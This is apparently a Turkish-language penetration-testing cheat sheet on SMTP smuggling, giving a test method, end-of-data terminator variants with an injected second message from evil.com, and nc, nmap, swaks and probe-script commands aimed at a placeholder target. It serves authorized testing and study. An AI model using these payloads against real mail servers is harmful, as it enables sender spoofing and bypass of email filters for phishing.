Skip to content

SMTP Smuggling

network smtp

SMTP smuggling, gönderen ve alan MTA’nın mesaj sonu / satır sonu yorumunu farklılaştırmasından doğar. Amaç: güvenlik filtrelerini atlatıp sahte veya ikinci bir mesaj enjekte etmek.

  1. Zincirdeki MTA’ları ve proxy/filter’ı belirle.

  2. <CR><LF>.<CR><LF> ve alternatif terminator varyantlarını test et.

  3. Enjekte mesajın ikinci alıcıya düşüp düşmediğini doğrula.

  4. Spoof + filter bypass etkisini kanıtla.

DATA
From: attacker@evil.com
To: victim@corp.local
Subject: one
hello
.
\r\n.\r\n
\n.\n
\r\n.\n
\n.\r\n
\r\n.\r\nMAIL FROM:<second@evil.com>\r\n...
Terminal window
printf 'EHLO a\r\nMAIL FROM:<a@evil.com>\r\nRCPT TO:<victim@corp.local>\r\nDATA\r\nSubject: x\r\n\r\nbody\r\n.\r\nQUIT\r\n' | nc TARGET 25
Terminal window
# İkinci mesajı DATA gövdesine gömülü terminator ile dene
Outer message → filter görür
Inner message → outbound MTA ayrı mail olarak iletir
- SPF/DKIM bypass görünümü (yanlış hizalı zincir)
- Güvenlik gateway'inin engellediği eki iç mesajda geçirmek
- İç kullanıcıya spoof From ile ikinci mail
Terminal window
nmap -p25,465,587 -sV TARGET
Terminal window
swaks --server TARGET --to victim@corp.local --from a@evil.com --data smuggle.eml
Terminal window
python3 smtp_smuggle_probe.py --target TARGET --rcpt victim@corp.local
[ ] MTA zinciri haritalandı
[ ] Terminator varyantları gönderildi
[ ] İkinci/mesaj-içi teslimat kanıtlandı
[ ] Spoof veya filter bypass etkisi belgelendi